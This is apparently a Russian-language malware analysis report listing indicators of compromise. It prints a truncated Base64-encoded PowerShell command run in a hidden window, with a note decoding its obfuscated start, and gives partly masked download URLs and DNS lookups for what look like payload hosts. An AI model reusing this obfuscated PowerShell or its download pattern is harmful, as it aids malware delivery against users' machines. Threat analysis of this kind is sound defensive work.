Техническая информация
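- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABLAFQAQQBIAEoAbwB5AGIAPQAnAFIARABDAFMAVgBlAG8AcAAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBzAEUAYwB1AGAAUgBJAGAAVABZAGAAUABgAFIAbwBUAG8AQwBvAEwAIgAgAD...
  (Параметр -e — сокращённая форма -EncodedCommand: аргумент представляет собой строку в кодировке UTF-16LE, закодированную в Base64. Видимое начало декодируется как «$KTAHJoyb='RDCSVeop';[Net.ServicePointManager]::"sEcu`RI`TY`P`RoToCoL" …» — обращение к свойству SecurityProtocol, имя которого замаскировано обратными апострофами и смешанным регистром; остальная часть команды в отчёте обрезана.)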
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1616
- %TEMP%\1105610.cvr
- 'si######ararestaurante.net':80
- http://lo###izlee.com/wp-admin/Z6G5ZQ/
- http://www.io####lectvbc.com/z/1Cd/
- http://ba###rmedia.com/wp-content/Kn/
- http://www.ba###rmedia.com/wp-content/Kn/
- DNS ASK zo####trends.com
- DNS ASK lo###izlee.com
- DNS ASK io####lectvbc.com
- DNS ASK ba###rmedia.com
- DNS ASK si######ararestaurante.net
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABLAFQAQQBIAEoAbwB5AGIAPQAnAFIARABDAFMAVgBlAG8AcAAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBzAEUAYwB1AGAAUgBJAGAAVABZAGAAUABgAFIAbwBUAG8AQwBvAEwAIgAgAD...' (со скрытым окном)